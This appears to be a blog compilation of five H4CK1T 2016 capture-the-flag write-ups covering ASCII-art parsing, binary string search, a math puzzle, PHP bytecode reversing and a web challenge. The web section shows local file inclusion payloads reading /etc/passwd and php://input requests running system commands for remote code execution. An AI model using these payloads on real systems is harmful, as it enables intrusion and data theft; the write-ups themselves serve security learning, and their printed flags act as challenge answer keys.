[H4CK1T 2016] Belarus – Electronicon Writeup

Description:

Belarus – Electronicon – PPC – 250 pts
EN: This task is one of the methods for the psychological attacks. It is intended for people who don’t have heart diseases and reached 18 years 😉

h4ck1t{flag.upper()}

paint.txt

As the attached file says, it was real pain. I opened the file in the browser and saw this horrible thing:

h4ck1t_belarus_1

Looks bad and it crashed my browser. This text file was too big for it to handle. So I opened it on Notepad++ and it was’t any better:

h4ck1t_belarus_2

Still terrifying and it was heavy for notepad++ also. But this time something catched my eye. Look at the rows panel on the left, it says only 1 line. Let’s cancel word wrap (View > Word wrap) and check what it is:

h4ck1t_belarus_3

Aah ah! It was a HUGE ascii-art. How huge? 11 rows of 1830661 chars each! It’s a long hex string. So now we need to parse it. I tried using this module but without any success so I decided to go for the hard way. I parsed it myself.

First, I edited the file in order to make it easy for me to parse it. I wanted that every char will be in it’s own line. I wrote a script to separate the characters:

import os

fin = open('pain.txt','r')
fout = open('out.txt', 'w')

content=fin.read()

splitted=content.split('\n')
width=13
	
print len(content)
for j in xrange(len(splitted[0])/width):
	for i in xrange(len(splitted)):
		fout.write(splitted[i][:width]+"\n")
		splitted[i]=splitted[i][width:]

Now let’s open the edited file with EmEditor that is capable of open large files and see how our file is looking like:

h4ck1t_belarus_4

Good! Looks exactly like I wanted! Now in order to parse it we need to tell the code how every letter or digit is looking like so I started to define variable for each letter or digit with the matching ascii-art. It was something like that:

f_in = open('out.txt', 'r')
ff = open('flag.txt', 'w')
content = f_in.read()
content = content.split("\n")

f = content[0:11] # The letter f
c8 = content[37:48] # The digit 8
... # Another letters and digits
... # Another letters and digits
... # Another letters and digits

index = 0
while True:
     lines=content[index*12:(index+1)*12-1]
     if lines==a:
             ff.write("a")
     elif lines==b:
             ff.write("b")
     elif lines==c:
             ff.write("c")
     elif lines==c0:
             ff.write("0")
     elif lines==c1:
             ff.write("1")
     elif lines==c2:
             ff.write("2")
     elif lines==c3:
             ff.write("3")
     elif lines==c4:
             ff.write("4")
     elif lines==c5:
             ff.write("5")
     elif lines==c6:
             ff.write("6")
     elif lines==c7:
             ff.write("7")
     elif lines==c8:
             ff.write("8")
     elif lines==c9:
             ff.write("9")
     elif lines==d:
             ff.write("d")
     elif lines==e:
             ff.write("e")
     elif lines==f:
             ff.write("f")
     index+=1

I took the long hex-string and paste in hex editor. It was this photo: h4ck1t_belarus_5

Well, that’s it. We got the flag and we now can rest in peace.

Flag: h4ck1t{1_L0V3_3P1C_F0NT$}

[H4CK1T 2016] 1n51d3r’5 j0b – Canada Writeup

Description:

1n51d3r’5 j0b – Canada – 300 – Forensics
Tommy wrote a program. It seems he has hidden from us important information. Find out what Tommy hides.
http://ctf.com.ua/data/attachments/Tommy_2e00c18e3a480959ba5fb4f65ff7f2b7.zip

Oh god, this challenge was so fun. The easiest 300 point I’ve ever got. I’m sure it wasn’t the expected solution but it works so who am I to complain. Three commands, that’s all.

Megabeets:/tmp/h4ckit/canada# unzip Tommy_2e00c18e3a480959ba5fb4f65ff7f2b7.zip
Archive:  Tommy_2e00c18e3a480959ba5fb4f65ff7f2b7.zip
   creating: 300/
  inflating: 300/out.txt
  inflating: 300/parse
Megabeets:/tmp/h4ckit/canada# ll
total 628
drwxrwxrwx 2 root root      0 Oct  3 00:22 ./
drwxrwxrwx 2 root root      0 Oct  2 16:04 ../
drwxrwxrwx 2 root root      0 Sep 24 18:17 300/
-rwxrwxrwx 1 root root 634168 Sep 28 20:42 Tommy_2e00c18e3a480959ba5fb4f65ff7f2b7.zip*
Megabeets:/tmp/h4ckit/canada# strings /300/parse | grep -i h4ck1t{
...h4ck1t{T0mmy_g0t_h1s_Gun}...

I don’t even know what the challenge is about. Just moved to the next challenge without asking any unnecessary questions.

Flag: h4ck1t{T0mmy_g0t_h1s_Gun}

[H4CK1T 2016] HellMath – Mongolia Writeup

Description:

HellMath – Mongolia – 100 – PPC – NEW

EN: Somebody thinks that you are able to calculate well. Is it true? Pass this task, prove the abilities and maybe we will recommend you to one of the most secret missions in this war.

# nc ctf.com.ua 9988 #

This one was a tricky question. Sometime we tend to think too complicated that we forget the basics of the basics.

Let’s begin. We are given with a netcat command. Let’s run it and see what will happen:

Megabeets: /tmp/h4ck1t/# nc ctf.com.ua 9988
Hello, stranger!
In this task you must solve 100 math questions.
Every task prints value C, where

C = A ^ B
and you need to return A and B.
Simple, isn't it?

C =  902688766290655704373689275053375955411443638316509920323848941975222889419457168696920458154297992623673837270038581569454814243805830583810239007096636651566143112784253577358992076929281284042240081518611899927486014041391480636127371844583712500925858241436577687881647483088199415935267570657867465207599620844695004309619118983781089160978919651087719815749856394166367766706778110070467678821838496167634418163901082752730509337302890389749997313424181834067339889277882795763685153563883836605864618300712713269080489519361527692457350059854544553090827217232806958474200121801180519077734723322730821821456307012680580248247037218481409333193782453105202353618778481032198022578852166518606909721942977575590954265237839696664727220865292977163448587698573864445402565395985502519681641780784380764161304054798829812233490916257278759562538568573426337720533085242758348167474155869479478584700074966635983754095730722241717146186660268605302301836193395575194171496181059843678720055443249024604241326634039569309251564445571858850712209536694524027635248909838940066204355066967778407959555544148932174508982884171285719680370353907943024211899094303816973257264835368157414233144693065775543775665646374894255716733398422962657186374363379853482641303616490385754787152837430574499189926206208167378653776600678668050752826349915972573133077173212387799225263508329369454811848100118727431542734051975488119495581578101088438806260901755298558179381970655381433179960687477909164284017317873303284836205753800005799794061481880410000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Well, We are given with a number C and we need to find numbers A and B that A^B (Power, not XOR) gives C.

At the beginning I tried to find algorithms online, “Such algorithms must exist!” I thought to myself. I found nothing and gave up for the day because it was late and I wanted to sleep. I was in my bed while message a friend the question and he simply answered:
“Did you tried 1?”
– “What 1?”
“You know, every number power 1 equals the number” (i.e C = C^1)
– “OMG! It is so simple! You are the smartest person on earth!”

So I ran to my computer and wrote this short python script that gave me the flag:

from pwn import *
from time import sleep

r = remote('ctf.com.ua', 9988)
 
print r.recvuntil('?')
print r.recvline()

counter=0

while True:	
	if counter==100:
		print r.recv()
	q = r.recvline()
	c = q[5:].rstrip('\n')
	print q
	print "\n----------\n"
	print c

	ans = '%s 1'%c
	print ans
	r.send('%s\n'%ans)
	counter+=1
	
# Flag: h4ck1t{R4ND0M_1S_MY_F4V0UR1T3_W34P0N}

Flag: h4ck1t{R4ND0M_1S_MY_F4V0UR1T3_W34P0N}

[H4CK1T 2016] Pentest – Mexico Writeup

Description:

Task: Remote pentest – Mexico – 150 – Web

Our foreign partners have some problems with qualified staff in the field of information technology, we decided to help them and to conduct remote testing of their new website. Your task is to find a hole in the system and grab some information to confirm the hack .Good luck !
http://91.231.84.36:9150/

YAY! Web challenge! If you are following my blog (If not, the subscribe form is on left) you already know how much I love web challenges, It’s either easy points or great puzzle.

Let’s open the website and see what we have:

h4ck1t_mexico1

WOW! JUSTICE LEAGUE! Did I mentioned that I love comic books and especially Batman? Oh, Not yet?

Well, this challenge is going to be awesome. No. It’s already awesome!

OK, deep breath. Let’s start. See that menu on the bottom? Let’s click on some link to see what will happen.

h4ck1t_mexico2

Look at the URL, the “about” page is included by the “index.php” using php commands ‘require’ or ‘include’. When we see something like that in a challenge we can check if the site is vulnerable to LFI attack. In Local File Inclusion attack we can include pages from the local server. Let’s try to include /etc/passwd to check for the existence of the vulnerability

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd

Didn’t work. Let’s try to add null byte at the end

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd%00

h4ck1t_mexico3

It worked! We successfully got the /etc/passwd file. So what now? Let’s try to read the pure php file to see if the flag is in the php pages.

We can use php://filter to print the content of index.php in base64 format. We need to encode the content because we don’t want the php engine to compile the php parts of the code.

http://91.231.84.36:9150/index.php?page=php://filter/convert.base64-encode/resource=index

We got encoding page, now let’s decode it and see if we find a flag . I deleted some content to decrease the size of the code in the post.

<?php
    if ($_GET["page"]) {
    $file = $_GET["page"].".php";
    // simulate null byte issue
    $file = preg_replace('/\x00.*/',"",$file);
        include($file);
    } 
    else
    {
        echo '    <div class="container">
        <div class="row">
            <div class="col-md-6 col-sm-12">
                <h1>The Big Picture</h1>
                <p>Welcome to the Big Picture. This fantastic digital resource combines the best of formal and informal learning. 
If you are already using The Big Picture, you can register for and access exclusive extra material from this platform. 
This is The Big Picture: have you experienced it yet?  </p> 
            </div>
        </div>';
    }
    //flag{h@h@h@_man_n1ce_try} 

?>
<!DOCTYPE html>
<html class="full" lang="en">
<head>

...
...
...

    </div>
    <script src="js/jquery.js"></script>
    <script src="js/bootstrap.min.js"></script>

</body>

</html>

Nope. No flag. The “flag{…}” thing isn’t really the flag because the flag in this CTF should be in h4ck1t{…} format.
Also the other pages like ‘about’ and ‘contact’ is not contain any flag. So we probably need to perform LFI to RCE (Remote Code Execution) attack. We can use the php://input method to send php commands through Post requests. Using Firefox Hackbar plugin we can do it easily.
Put the URL to be http://91.231.84.36:9150/index.php?page=php://input And the POST data to be

<?  system('ls') ;?>

h4ck1t_mexico4

Success. We got the RCE and we now know about a new secret file. Let’s read it using the same way but this time with

 <?  system('cat file') ;?>

And we got the flag 🙂

Flag: h4ck1t{g00d_rfi_its_y0ur_fl@g}

[H4CK1T 2016] PhParanoid – Malaysia Writeup

Description:

Task: PhParanoid – Malaysia – 225 – Rever$e

EN: I am so paranoid! I try to hide everything from this mad world! I have already obfuscated my calculator sources, my javascript site sources and I`m not going to stop! And u will never know what I hide, haha!

In this challenge we got Phb, i.e php file that compiled using BCompiler (PHP Bytecode Compiler). We can Decompile it using this.

The decompilation process is very simple and we easily got this php file (I deleted repeated parts to decrease size):

<?php
$secret ="The";
do {
	$is_secret_exists = false;

	if (isset($secret)) {
		$is_secret_exists = true;
	}
	else {
		break;
	}

	$is_secret_valid = false;
	if (strstr($secret, "The") && (strpos($secret, "The") == 0)) {
		$is_secret_valid = true;
		echo $secret;
	}

	$c0 = chr(ord($secret[0]) + 20);

	if ((ord($c0) + (-20)) != 84) {
		unset($c0);
		break;
	}

	$c1 = chr(ord($secret[1]) + (-52));

	if ((ord($c1) + 52) != 104) {
		unset($c1);
		break;
	}
	
		...
		...
		...

	$c43 = chr(ord($secret[43]) + (-35));

	if ((ord($c43) + 35) != 103) {
		unset($c43);
		break;
	}

	$c44 = chr(ord($secret[44]) + 79);

	if ((ord($c44) + (-79)) != 46) {
		unset($c44);
		break;
	}
} while (false);

?>

So what we have here is a manipulation on char codes to check if the secret variable is valid. Let’s find out which char codes we need to use in order to find the flag.

Every if statement in the code looks like the following code. I added a comments for explanation

# the first character of the flag is the first character of the 'secret' + 20
$c0 = chr(ord($secret[0]) + 20);

# check if the char code of the first character of the flag -20 equals 84
if ((ord($c0) + (-20)) != 84) {
	unset($c0);
	break;
}

So, from this we can assume that the flag starts with chr(20+84) which is ‘h’. Make sense because we know that the flag is starting with “h4ck1t{“. I made some manipulation on the script (Lot of replaces in Notepad++ to keep only the relevant char codes) to create a list of the char codes and then converted them to chars with python.

>>> charcodes = [+20 +84,-52 +104,-2 +101,-7 +114,-52 +101,+43 +73,+8 +115,+1 +78,-63 +111,+22 +82,-10 +105,-55 +103,+8 +104,-49 +116,-17 +65,-42 +110,-49 +100,-34 +87,-19 +114,-40 +111,-62 +110,+13 +103,+49 +46,-35 +84,-26 +104,-48 +101,-65 +114,-33 +101,-28 +79,-15 +110,-31 +108,-16 +121,+8 +70,-66 +117,-15 +110,-12 +65,-61 +110,-33 +100,+9 +66,-16 +111,-37 +114,-56 +105,+0 +110,-35 +103,+79 +46]
>>> flag = ''
>>>
>>> for c in charcodes:
...     flag+=chr(c)
...
>>> print flag
h4ck1t{O0h_0pC0D35_G0t_1N51D3_MiN3_51CK_M1nD}